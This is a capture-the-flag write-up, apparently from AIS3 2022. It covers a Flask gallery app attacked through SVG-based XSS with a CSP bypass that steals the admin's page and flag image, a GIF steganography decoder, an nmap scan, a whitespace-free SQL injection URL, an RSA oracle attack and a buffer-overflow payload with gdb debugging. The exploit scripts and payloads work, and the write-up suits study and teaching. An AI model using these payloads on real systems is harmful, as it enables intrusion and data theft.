FLAG_UUID = os.getenv('FLAG_UUID', str(uuid.uuid4()))

def db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect('/tmp/db.sqlite3')
        db.row_factory = sqlite3.Row
    return db

@app.before_first_request
def create_tables():
    cursor = db().cursor()
    cursor.executescript("""
    CREATE TABLE IF NOT EXISTS users (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        username TEXT,
        password TEXT
    );
    CREATE TABLE IF NOT EXISTS images (
        id INTEGER PRIMARY KEY AUTOINCREMENT,
        uuid TEXT,
        title TEXT,
        filename TEXT,
        user_id INTEGER,
        FOREIGN KEY(user_id) REFERENCES users(id)
    );
    """)
    cursor.execute("SELECT * FROM users WHERE username='admin'")
    if cursor.fetchone() == None:
        cursor.execute("INSERT INTO users (username, password) VALUES (?, ?)", ('admin', ADMIN_PASSWORD))
        admin_id = cursor.lastrowid
        cursor.execute("INSERT INTO images (user_id, uuid, filename, title) VALUES (?, ?, ?, ?)", (admin_id, FLAG_UUID, FLAG_UUID+".png", "FLAG"))
    db().commit()

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.after_request
def add_csp(response):
    response.headers['Content-Security-Policy'] = ';'.join([
        "default-src 'self'",
        "font-src 'self' https://fonts.googleapis.com https://fonts.gstatic.com"
    ])
    return response

@app.route('/')
def index():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    cursor = db().cursor()
    cursor.execute("SELECT * FROM images WHERE user_id=?", (session['user_id'],))
    images = cursor.fetchall()
    return render_template('index.html', images=images)

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        username = request.form['username']
        password = request.form['password']
        if len(username) < 5 or len(password) < 5:
            return render_template('login.html', error="Username and password must be at least 5 characters long.")
        cursor = db().cursor()
        cursor.execute("SELECT * FROM users WHERE username=?", (username,))
        user = cursor.fetchone()
        if user is None:
            user_id = cursor.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password)).lastrowid
            session['user_id'] = user_id
            db().commit()
            return redirect(url_for('index'))
        elif user['password'] == password:
            session['user_id'] = user['id']
            return redirect(url_for('index'))
        else:
            return render_template('login.html', error="Invalid username or password")

@app.route('/image/<uuid>')
def view(uuid):
    cursor = db().cursor()
    cursor.execute("SELECT * FROM images WHERE uuid=?", (uuid,))
    image = cursor.fetchone()
    if image:
        if image['user_id'] != session['user_id'] and session['user_id'] != 1:
            return "You don't have permission to view this image.", 403
        return send_file(os.path.join(app.config['UPLOAD_FOLDER'], image['filename']))
    else:
        return "Image not found.", 404

@app.route('/image/<uuid>/download')
def download(uuid):
    cursor = db().cursor()
    cursor.execute("SELECT * FROM images WHERE uuid=?", (uuid,))
    image = cursor.fetchone()
    if image:
        if image['user_id'] != session['user_id']:
            return "You don't have permission to download this image.", 403
        return send_file(os.path.join(app.config['UPLOAD_FOLDER'], image['filename']), as_attachment=True, mimetype='application/octet-stream')
    else:
        return "Image not found.", 404

@app.route('/upload', methods=['GET', 'POST'])
def upload():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    if request.method == 'GET':
        return render_template('upload.html')
    else:
        title = request.form['title'] or '(No title)'
        file = request.files['file']
        if file.filename == '':
            return render_template('upload.html', error="No file selected")
        extension = pathlib.Path(file.filename).suffix
        if extension not in IMAGE_EXTENSIONS:
            return render_template('upload.html', error="File must be an image")
        image_uuid = str(uuid.uuid4())
        filename = image_uuid + extension
        cursor = db().cursor()
        cursor.execute("INSERT INTO images (user_id, uuid, title, filename) VALUES (?, ?, ?, ?)", (session['user_id'], image_uuid, title, filename))
        db().commit()
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        return redirect(url_for('index'))

@app.route('/report', methods=['GET', 'POST'])
def report():
    if 'user_id' not in session:
        return redirect(url_for('login'))
    if request.method == 'GET':
        return f'''
        <h1>Report to admin</h1>
        <p>注意:admin 會用 <code>http://web/</code> (而非 {request.url_root} 作為 base URL 來訪問你提交的網站。</p>
        <form action="/report" method="POST">
            <input type="text" name="url" placeholder="URL ({request.url_root}...)">
            <input type="submit" value="Submit">
        </form>
        '''
    else:
        url = request.form['url']
        if url.startswith(request.url_root):
            url_path = url[len(request.url_root):]
            app.queue.enqueue('xssbot.browse', url_path)
            return 'Reported.'
        else:
            return f"[ERROR] Admin 只看 {request.url_root} 網址"
```
:::

### SVG XSS

The upload handler only checks that the extension is one of the image extensions known to `mimetypes`, and `.svg` is one of them, so an SVG containing a `<script>` element can be uploaded and is served back from `/image/<uuid>`.

### Bypassing CSP

The response header `Content-Security-Policy: default-src 'self'` blocks inline script, but it still allows script files loaded from the same origin. Two files are therefore uploaded: `script1.js.svg`, whose body is plain JavaScript, and `forward.svg`, which loads it with `<script xlink:href="/image/<uuid>/download">`. The `/download` route matters: it serves the file as `application/octet-stream`, which the browser will execute as a script (no `X-Content-Type-Options: nosniff` is set), whereas the `image/svg+xml` type returned by `/image/<uuid>` is refused for script execution. `forward.svg` is then submitted through Report so the admin's browser renders it.

`script1.js.svg`

```javascript
(async () => {
    // get admin home page first
    const payload = await fetch("/").then(e => e.text()).then(e => e)
    console.log(payload)

    // log in as wiener
    await fetch("/login", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "body": "username=wiener&password=peter",
        "method": "POST",
        "mode": "cors",
        "credentials": "include"
    });

    // transfer the data out
    const formData = new FormData();
    formData.append("title", "js_fetch_start1")
    formData.append("file", new Blob([payload]), "test1.svg");
    fetch("/upload", {
        "referrerPolicy": "strict-origin-when-cross-origin",
        "body": formData,
        "method": "POST",
        "mode": "cors",
        "credentials": "include"
    });
})();
```

`forward.svg`

```html
<svg width="70" height="70" viewBox="0 0 70 70" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<rect width="70" height="70" fill="#E5E5E5"/>
<g clip-path="url(#clip0)">
<rect width="70" height="70" fill="white"/>
<g opacity="0.76">
<path d="M43.5 32.9019C45.5 34.0566 45.5 36.9434 43.5 38.0981L18.75 52.3875C16.75 53.5422 14.25 52.0988 14.25 49.7894L14.25 21.2106C14.25 18.9012 16.75 17.4578 18.75 18.6125L43.5 32.9019Z" fill="#CFFCCF"/>
</g>
<path d="M62.5001 32.9019C64.5001 34.0566 64.5001 36.9434 62.5001 38.0981L37.7501 52.3875C35.7501 53.5422 33.2501 52.0988 33.2501 49.7894L33.2501 21.2106C33.2501 18.9012 35.7501 17.4578 37.7501 18.6125L62.5001 32.9019Z" fill="#FCCFFC" fill-opacity="0.76"/>
</g>
<defs>
<clipPath id="clip0">
<rect width="70" height="70" fill="white"/>
</clipPath>
</defs>
<script type="text/javascript" xlink:href="/image/450bafc2-e5ba-4b77-b3e0-ef8263a479a5/download"></script>
</svg>
```

Response (the admin's gallery page, exfiltrated):

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Gallery</title>
    <link rel="stylesheet" href="/static/style.css">
</head>
<body>
    <div class="main">
        <h1>Gallery</h1>
        <nav>
            <a href="/">[Home]</a> |
            <a href="/upload">[Upload]</a> |
            <a href="/report">[Report]</a>
        </nav>
    </div>
    <hr>
    <div class="main">
        <h2>Images</h2>
        <div class="image">
            <figure>
                <img src="/image/f4cdc213-a638-4195-9536-eafc2f635ecd" alt="FLAG">
                <figcaption>> FLAG</figcaption>
            </figure>
            <div class="utils">
                <a href="/image/f4cdc213-a638-4195-9536-eafc2f635ecd">[View]</a> |
                <a href="/image/f4cdc213-a638-4195-9536-eafc2f635ecd/download">[Download]</a>
            </div>
        </div>
        <div class="image">
            <figure>
                <img src="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be" alt="js_fetch_start1">
                <figcaption>> js_fetch_start1</figcaption>
            </figure>
            <div class="utils">
                <a href="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be">[View]</a> |
                <a href="/image/4f1e876c-3c21-41aa-85a7-c394fbc7a1be/download">[Download]</a>
            </div>
        </div>
    </div>
    <hr>
    <footer>
        <p>&copy; 2022 Gallery</p>
    </footer>
</body>
</html>
```

### Get the flag

With the FLAG image's UUID known, the same loader is reused; this time the script fetches the image itself and re-uploads it into the attacker's gallery.

`script1.js.svg`

```javascript
(async () => {
    // get the flag
    const payload = await fetch("/image/f4cdc213-a638-4195-9536-eafc2f635ecd").then(e => e.blob()).then(e => e)
    console.log(payload)

    // log in as wiener
    await
fetch("/login", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "username=wiener&password=peter", "method": "POST", "mode": "cors", "credentials": "include" }); // transfer the data out const formData = new FormData(); formData.append("title", "js_fetch_start1") formData.append("file", payload, "test1.svg"); fetch("/upload", { "referrerPolicy": "strict-origin-when-cross-origin", "body": formData, "method": "POST", "mode": "cors", "credentials": "include" }); })(); ``` `forward.svg` ```html <svg width="70" height="70" viewBox="0 0 70 70" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <rect width="70" height="70" fill="#E5E5E5"/> <g clip-path="url(#clip0)"> <rect width="70" height="70" fill="white"/> <g opacity="0.76"> <path d="M43.5 32.9019C45.5 34.0566 45.5 36.9434 43.5 38.0981L18.75 52.3875C16.75 53.5422 14.25 52.0988 14.25 49.7894L14.25 21.2106C14.25 18.9012 16.75 17.4578 18.75 18.6125L43.5 32.9019Z" fill="#CFFCCF"/> </g> <path d="M62.5001 32.9019C64.5001 34.0566 64.5001 36.9434 62.5001 38.0981L37.7501 52.3875C35.7501 53.5422 33.2501 52.0988 33.2501 49.7894L33.2501 21.2106C33.2501 18.9012 35.7501 17.4578 37.7501 18.6125L62.5001 32.9019Z" fill="#FCCFFC" fill-opacity="0.76"/> </g> <defs> <clipPath id="clip0"> <rect width="70" height="70" fill="white"/> </clipPath> </defs> <script type="text/javascript" xlink:href="/image/0e14960e-3b76-4f22-8613-fbb562c5ce2e/download"></script> </svg> ``` ### Flag ![](https://i.imgur.com/bUmBaKl.png) ## Gift in the dream [100 pts] 發現 gif 的 duration 有 flag 的形狀 ![](https://i.imgur.com/SALJRUS.png) 使用 PIL 取出 ```python from PIL import Image # modified from https://www.codespeedy.com/find-the-duration-of-gif-image-in-python/ def get_durations(img_obj): img_obj.seek(0) # move to the start of the gif, frame 0 durations = [] # run a while loop to loop through the frames while True: try: frame_duration = img_obj.info['duration'] # returns current frame duration in 
milli sec. durations.append(frame_duration) # now move to the next frame of the gif img_obj.seek(img_obj.tell() + 1) # image.tell() = current frame except EOFError: return durations # this will return the tot_duration of the gif def main (): img = Image.open('gift_in_the_dream_updated.gif') durations = get_durations(img) flag = "" for duration in durations: if duration == 10: break flag += chr(duration // 10) # AIS3{5T3g4n0gR4pHy_c4N_b3_fUn_s0m37iMe} print(flag) if __name__ == '__main__': main() ``` --- ## Private Browsing [500 pts] ![](https://i.imgur.com/kVbPyzJ.jpg) ```shell ch@CHSMB ~ % nmap 198.13.45.97 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-16 13:17 CST Nmap scan report for 198.13.45.97.vultrusercontent.com (198.13.45.97) Host is up (0.0062s latency). Not shown: 990 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6000/tcp open X11 6001/tcp open X11:1 6002/tcp open X11:2 6003/tcp open X11:3 6004/tcp open X11:4 6006/tcp open X11:6 6007/tcp open X11:7 12345/tcp open netbus Nmap done: 1 IP address (1 host up) scanned in 64.56 seconds ch@CHSMB ~ % ``` ## Cat Emoji Database 🐱 [487 pts] ### Get DBMS without Using `\s` ```url http://chals1.ais3.org:9487/api/emoji/(SELECT(128049)WHERE(@@version=@@version)) ``` DBMS: Microsoft `%C2%A0` ## Really Strange orAcle [480 pts] <!-- https://github.com/ashutosh1206/Crypton/tree/master/RSA-encryption --> ### 題目 > You have a RSA(-like) encryption oracle to use, but you know literally nothing about the public key. Can you still decrypt the flag with it? 
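Worked example for the Gallery challenge above (added here; it is not code from the write-up or from the challenge): a small evaluator for the `script-src`/`default-src` part of a CSP header, enough to show why `default-src 'self'` did not stop the attack. It assumes the admin's page origin `http://web` from the report form and the `/image/<id>/download` path from the SVG above; nonces, hashes, wildcard hosts and path matching are left out as a simplification.

```python
from urllib.parse import urljoin, urlsplit

# Assumed page the admin is looking at (origin taken from the challenge's report form, id made up for the demo).
PAGE_URL = "http://web/image/11111111-2222-3333-4444-555555555555"


def parse_csp(header):
    """Split a Content-Security-Policy header into {directive: [source expressions]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def _origin(url):
    """The (scheme, host, port) triple that 'self' is compared against."""
    u = urlsplit(url)
    scheme = u.scheme.lower()
    port = u.port or {"http": 80, "https": 443}.get(scheme)
    return (scheme, (u.hostname or "").lower(), port)


def _host_source_matches(source, script_url):
    """Simplified host-source matching: '*', exact scheme://host[:port], or scheme-less host[:port]."""
    if source == "*":
        return True
    target = _origin(script_url)
    if "://" not in source:
        host, _, port = source.partition(":")
        return host.lower() == target[1] and (not port or int(port) == target[2])
    return _origin(source) == target


def script_allowed(csp_header, page_url, script_src=None):
    """Would a browser run this script under the policy?  script_src=None means an inline script."""
    policy = parse_csp(csp_header)
    sources = policy.get("script-src", policy.get("default-src"))  # script-src falls back to default-src
    if sources is None:
        return True  # no governing directive at all
    keywords = {s.lower() for s in sources if s.startswith("'")}
    hosts = [s for s in sources if not s.startswith("'")]
    if keywords == {"'none'"} and not hosts:
        return False
    if script_src is None:  # inline <script> or event handler (nonces/hashes ignored in this demo)
        return "'unsafe-inline'" in keywords
    script_url = urljoin(page_url, script_src)  # xlink:href="/image/.../download" resolves against the page
    if "'self'" in keywords and _origin(script_url) == _origin(page_url):
        return True
    return any(_host_source_matches(h, script_url) for h in hosts)
```

`'self'` is an origin check and nothing more: a same-origin `download` endpoint that returns an uploaded file is as trusted as the site's own scripts. The hardening a practitioner would look for here is serving user uploads from a separate origin, or at least with `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff`, so that an uploaded SVG is never rendered or executed in the application's origin.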
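Added example for the Gift in the dream section (not from the write-up): a pure-Python parser for the GIF block structure that reads each frame's delay straight from the Graphic Control Extension, the field Pillow exposes as `info['duration']`. The GIF it reads is constructed inside the block (1×1 frames with the smallest valid LZW payload), so it runs without Pillow or the challenge file. Delays are stored in 1/100 s, which is why the PIL script above divides Pillow's millisecond value by 10.

```python
import struct

GIF_HEADER = b"GIF89a"
# Smallest valid image data for a 1x1 frame: LZW minimum code size 2, one 2-byte sub-block, terminator.
MIN_IMAGE_DATA = b"\x02\x02\x44\x01\x00"


def build_gif(delays_cs):
    """Constructed sample: a minimal 1x1 GIF89a whose frame delays (in centiseconds) are the given list."""
    out = bytearray(GIF_HEADER)
    out += struct.pack("<HHBBB", 1, 1, 0x00, 0, 0)  # logical screen 1x1, no global colour table
    for delay in delays_cs:
        # Graphic Control Extension: introducer, label, size 4, packed flags, delay (LE), transparent idx, terminator
        out += b"\x21\xF9\x04\x00" + struct.pack("<H", delay) + b"\x00\x00"
        # Image descriptor: separator, left, top, width, height, packed flags (no local colour table)
        out += b"\x2C" + struct.pack("<HHHHB", 0, 0, 1, 1, 0x00)
        out += MIN_IMAGE_DATA
    out += b"\x3B"  # trailer
    return bytes(out)


def _skip_sub_blocks(data, pos):
    """Return the position just past a chain of length-prefixed sub-blocks ending in a 0x00 block."""
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return pos
        pos += n


def frame_delays(data):
    """Walk the GIF block by block and collect the delay of every Graphic Control Extension."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13
    if packed & 0x80:  # global colour table present: 3 bytes per entry, 2^(N+1) entries
        pos += 3 * (2 << (packed & 0x07))
    delays = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:  # trailer
            break
        if block == 0x21:  # extension
            label = data[pos]
            pos += 1
            if label == 0xF9:  # GCE payload: size(1) packed(1) delay(2) transparent(1)
                delays.append(struct.unpack_from("<H", data, pos + 2)[0])
            pos = _skip_sub_blocks(data, pos)
        elif block == 0x2C:  # image descriptor
            ipacked = data[pos + 8]
            pos += 9
            if ipacked & 0x80:  # local colour table
                pos += 3 * (2 << (ipacked & 0x07))
            pos += 1  # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return delays


def extract_message(data, terminator_cs=1):
    """Decode the hidden text: one character per frame, stopping at the 1 cs (10 ms) terminator frame."""
    chars = []
    for delay in frame_delays(data):
        if delay == terminator_cs:
            break
        chars.append(chr(delay))
    return "".join(chars)


if __name__ == "__main__":
    sample = build_gif([ord(c) for c in "AIS3{demo}"] + [1, 1])
    print(frame_delays(sample))
    print(extract_message(sample))
```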
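Added example for the Cat Emoji Database section (not the challenge's code: it uses SQLite in place of SQL Server and a constructed two-row `emoji` table): the whitespace-free boolean probe run against a string-built query, and the same input against a parameterised one. The whitespace filter is an assumption modelled on the write-up's description of the endpoint.

```python
import re
import sqlite3

CAT = 128049  # 0x1F431, the code point of the cat emoji the API returns


def make_db():
    """Constructed in-memory stand-in for the challenge's emoji table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE emoji (id INTEGER, glyph TEXT NOT NULL)")
    db.executemany("INSERT INTO emoji VALUES (?, ?)", [(CAT, chr(CAT)), (128054, chr(128054))])
    return db


def has_ascii_whitespace(s):
    """The kind of filter the challenge appears to apply (assumption: ASCII whitespace only)."""
    return re.search(r"[ \t\r\n\f\v]", s) is not None


def lookup_vulnerable(db, user_id):
    """String-concatenated query: whatever passes the whitespace filter is parsed as SQL."""
    if has_ascii_whitespace(user_id):
        return None  # request rejected
    row = db.execute(f"SELECT glyph FROM emoji WHERE id = {user_id}").fetchone()
    return row[0] if row else None


def lookup_safe(db, user_id):
    """Parameterised query: the same payload is compared as a value and matches nothing."""
    row = db.execute("SELECT glyph FROM emoji WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def oracle_payload(condition):
    """Whitespace-free boolean probe: the subquery is the cat's id when `condition` holds, NULL otherwise."""
    return f"(SELECT({CAT})WHERE({condition}))"


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, oracle_payload("1=1")))  # cat: condition true
    print(lookup_vulnerable(db, oracle_payload("1=2")))  # None: condition false
    print(lookup_safe(db, oracle_payload("1=1")))        # None: treated as a literal
```

Each probe answers one yes/no question about the database, so `@@version`-style conditions can be asked one character at a time; parameterising the query removes the oracle entirely, whereas a whitespace blocklist only changes the spelling of the payload.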
Challenge source:

```python
from Crypto.Util.number import getStrongPrime, getRandomRange, isPrime, bytes_to_long
from pathlib import Path
import json
import os

flag = os.environb[b"FLAG"]

keyfile = Path("./key.json")
if keyfile.is_file():
    key = json.loads(keyfile.read_text())
    n = key["n"]
    e = key["e"]
else:
    p = getStrongPrime(1024)
    n = p * p
    while True:
        e = getRandomRange(2, p) | 1
        if isPrime(e):
            break
    keyfile.write_text(json.dumps({"n": n, "e": e}))

flag += os.urandom(2048 // 8 - len(flag))
c = pow(bytes_to_long(flag), e, n)
print(c)

while True:
    x = int(input())
    if x >= 0:
        print(pow(x, e, n))
```

### Idea

Feed the oracle $a$ and get $k = a^e \bmod n$; feed it $a \cdot a$ and get $s = (a^2)^e \bmod n$. Then $t_i = k \cdot k - s$ is always a multiple of $n$. Repeat with a few different $a$ and take the $\gcd$ of the $t_i$; once the $\gcd$ is the square of a prime, that is $n$, and its square root is $p$.

With $p$ known, $e$ follows from one more query: $(1+p)^e \equiv 1 + e p \pmod{p^2}$, so the oracle's answer for $1+p$ gives $e$ directly (the challenge draws $e < p$). Decrypt with $d = e^{-1} \bmod p(p-1)$.

> For people who already know p but not e, I think this page will help you a lot: https://en.wikipedia.org/wiki/Paillier_cryptosystem

## ASTJail [500 pts]

![](https://i.imgur.com/R5HC6Ku.png)

## BOF2WIN [100 pts]

https://www.youtube.com/watch?v=8QzOC8HfOqU

`main` reads with `gets` into a 16-byte buffer at `rbp-0x10`, so 16 bytes of buffer plus 8 bytes of saved `rbp` sit in front of the return address; byte 25 onward overwrites it. `get_the_flag` is at `0x401216`.

### `main.py`

```python
# get_the_flag: 0x0000000000401216
address = "\x16\x12\x40\x00\x00\x00\x00\x00"  # little-endian; every byte is < 0x80, so print()'s UTF-8 output is byte-exact
# address = "aaaabbbbccccdddd"               # first attempt: overwrite rip with a recognisable pattern
payload = f"AAAABBBBCCCCDDDDEEEEFFFF{address}"  # 16 bytes of buffer + 8 bytes of saved rbp, then the return address
# payload = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"  # pattern used to find the offset
print(payload)

# python3 main.py > exp
# nc chals1.ais3.org 12347 < exp
```

### gdb

The first breakpoint, `*main+140`, is past the end of `main` (it lands in `__libc_csu_init`), which is why the first run steps through that function. The useful ones are `*main+130` (`leave`) and `*main+131` (`ret`), where `info frame` shows the saved rip first as `0x4848484847474747` (`GGGGHHHH`, offset 24 of the pattern) and, with the final payload, as `0x401216`.

:::spoiler
```shell
c@cc:~/Downloads/bof2win/share$ gdb bof2win
GNU gdb (Ubuntu 12.0.90-0ubuntu1) 12.0.90
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from bof2win...
(No debugging symbols found in bof2win)
(gdb) disassemble main
Dump of assembler code for function main:
   0x00000000004012a4 <+0>:     endbr64
   0x00000000004012a8 <+4>:     push   %rbp
   0x00000000004012a9 <+5>:     mov    %rsp,%rbp
   0x00000000004012ac <+8>:     sub    $0x10,%rsp
   0x00000000004012b0 <+12>:    mov    0x2dc9(%rip),%rax        # 0x404080 <stdin@@GLIBC_2.2.5>
   0x00000000004012b7 <+19>:    mov    $0x0,%ecx
   0x00000000004012bc <+24>:    mov    $0x2,%edx
   0x00000000004012c1 <+29>:    mov    $0x0,%esi
   0x00000000004012c6 <+34>:    mov    %rax,%rdi
   0x00000000004012c9 <+37>:    call   0x401110 <setvbuf@plt>
   0x00000000004012ce <+42>:    mov    0x2d9b(%rip),%rax        # 0x404070 <stdout@@GLIBC_2.2.5>
   0x00000000004012d5 <+49>:    mov    $0x0,%ecx
   0x00000000004012da <+54>:    mov    $0x2,%edx
   0x00000000004012df <+59>:    mov    $0x0,%esi
   0x00000000004012e4 <+64>:    mov    %rax,%rdi
   0x00000000004012e7 <+67>:    call   0x401110 <setvbuf@plt>
   0x00000000004012ec <+72>:    lea    0xd24(%rip),%rdi        # 0x402017
   0x00000000004012f3 <+79>:    call   0x4010b0 <puts@plt>
   0x00000000004012f8 <+84>:    lea    -0x10(%rbp),%rax
   0x00000000004012fc <+88>:    mov    %rax,%rdi
   0x00000000004012ff <+91>:    mov    $0x0,%eax
   0x0000000000401304 <+96>:    call   0x401100 <gets@plt>
   0x0000000000401309 <+101>:   lea    -0x10(%rbp),%rax
   0x000000000040130d <+105>:   mov    %rax,%rsi
   0x0000000000401310 <+108>:   lea    0xd12(%rip),%rdi        # 0x402029
   0x0000000000401317 <+115>:   mov    $0x0,%eax
   0x000000000040131c <+120>:   call   0x4010d0 <printf@plt>
   0x0000000000401321 <+125>:   mov    $0x0,%eax
   0x0000000000401326 <+130>:   leave
   0x0000000000401327 <+131>:   ret
End of assembler dump.
(gdb) disassemble get_the_flag
Dump of assembler code for function get_the_flag:
   0x0000000000401216 <+0>:     endbr64
   0x000000000040121a <+4>:     push   %rbp
   0x000000000040121b <+5>:     mov    %rsp,%rbp
   0x000000000040121e <+8>:     sub    $0x40,%rsp
   0x0000000000401222 <+12>:    movq   $0x0,-0x40(%rbp)
   0x000000000040122a <+20>:    movq   $0x0,-0x38(%rbp)
   0x0000000000401232 <+28>:    movq   $0x0,-0x30(%rbp)
   0x000000000040123a <+36>:    movq   $0x0,-0x28(%rbp)
   0x0000000000401242 <+44>:    movq   $0x0,-0x20(%rbp)
   0x000000000040124a <+52>:    movq   $0x0,-0x18(%rbp)
   0x0000000000401252 <+60>:    mov    $0x0,%esi
   0x0000000000401257 <+65>:    lea    0xda6(%rip),%rdi        # 0x402004
   0x000000000040125e <+72>:    mov    $0x0,%eax
   0x0000000000401263 <+77>:    call   0x401120 <open@plt>
   0x0000000000401268 <+82>:    mov    %eax,-0x4(%rbp)
   0x000000000040126b <+85>:    lea    -0x40(%rbp),%rcx
   0x000000000040126f <+89>:    mov    -0x4(%rbp),%eax
   0x0000000000401272 <+92>:    mov    $0x30,%edx
   0x0000000000401277 <+97>:    mov    %rcx,%rsi
   0x000000000040127a <+100>:   mov    %eax,%edi
   0x000000000040127c <+102>:   call   0x4010f0 <read@plt>
   0x0000000000401281 <+107>:   lea    -0x40(%rbp),%rax
   0x0000000000401285 <+111>:   mov    $0x30,%edx
   0x000000000040128a <+116>:   mov    %rax,%rsi
   0x000000000040128d <+119>:   mov    $0x1,%edi
   0x0000000000401292 <+124>:   call   0x4010c0 <write@plt>
   0x0000000000401297 <+129>:   mov    -0x4(%rbp),%eax
   0x000000000040129a <+132>:   mov    %eax,%edi
   0x000000000040129c <+134>:   call   0x4010e0 <close@plt>
   0x00000000004012a1 <+139>:   nop
   0x00000000004012a2 <+140>:   leave
   0x00000000004012a3 <+141>:   ret
End of assembler dump.
(gdb) break *main+140
Breakpoint 1 at 0x401330
(gdb) run < exp
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x0000000000401330 in __libc_csu_init ()
(gdb) info registers
rax            0x7ffff7fa4200      140737353761280
rbx            0x0                 0
rcx            0x401330            4199216
rdx            0x7fffffffe048      140737488347208
rsi            0x7fffffffe038      140737488347192
rdi            0x1                 1
rbp            0x1                 0x1
rsp            0x7fffffffdfc8      0x7fffffffdfc8
r8             0x7ffff7f9df10      140737353735952
r9             0x7ffff7fc9040      140737353912384
r10            0x7ffff7fc3860      140737353889888
r11            0x206               518
r12            0x7fffffffe038      140737488347192
r13            0x4012a4            4199076
r14            0x0                 0
r15            0x401330            4199216
rip            0x401330            0x401330 <__libc_csu_init>
eflags         0x206               [ PF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) info frame
Stack level 0, frame at 0x7fffffffdfd0:
 rip = 0x401330 in __libc_csu_init; saved rip = 0x7ffff7dace1c
 called by frame at 0x7fffffffe020
 Arglist at 0x7fffffffdfc0, args:
 Locals at 0x7fffffffdfc0, Previous frame's sp is 0x7fffffffdfd0
 Saved registers:
  rip at 0x7fffffffdfc8
(gdb) disassemble get_the_flag
[... identical to the listing above ...]
(gdb) disassemble main
[... identical to the listing above ...]
(gdb) ni
0x0000000000401334 in __libc_csu_init ()
(gdb)
0x0000000000401336 in __libc_csu_init ()
[... 29 more `ni` steps through __libc_csu_init, 0x40133d up to 0x401394 ...]
(gdb)
0x00007ffff7dace1c in __libc_start_main_impl (main=0x4012a4 <main>, argc=1, argv=0x7fffffffe038, init=0x401330 <__libc_csu_init>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe028) at ../csu/libc-start.c:375
375     ../csu/libc-start.c: No such file or directory.
(gdb)
382     in ../csu/libc-start.c
(gdb)
0x00007ffff7dace26      382     in ../csu/libc-start.c
(gdb)
384     in ../csu/libc-start.c
(gdb)
0x00007ffff7dace2d      384     in ../csu/libc-start.c
(gdb)
392     in ../csu/libc-start.c
(gdb)
0x00007ffff7dace36      392     in ../csu/libc-start.c
(gdb)
0x00007ffff7dace38      392     in ../csu/libc-start.c
(gdb)
0x00007ffff7dace3b      392     in ../csu/libc-start.c
(gdb)
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ!

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401327 in main ()
(gdb)

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb)
The program is not being run.
(gdb)
The program is not being run.
(gdb) clear
No source file specified.
(gdb) clear *main+140
Deleted breakpoint 1
(gdb) disassemble main
[... identical to the listing above ...]
(gdb) break *main+130
Breakpoint 2 at 0x401326
(gdb) run < exp
Starting program: /home/c/Downloads/bof2win/share/bof2win < exp
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
What's your name? Hello, AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ!

Breakpoint 2, 0x0000000000401326 in main ()
(gdb) info registers
rax            0x0                 0
rbx            0x0                 0
rcx            0x7ffff7e97a37      140737352661559
rdx            0x0                 0
rsi            0x7fffffffbdf0      140737488338416
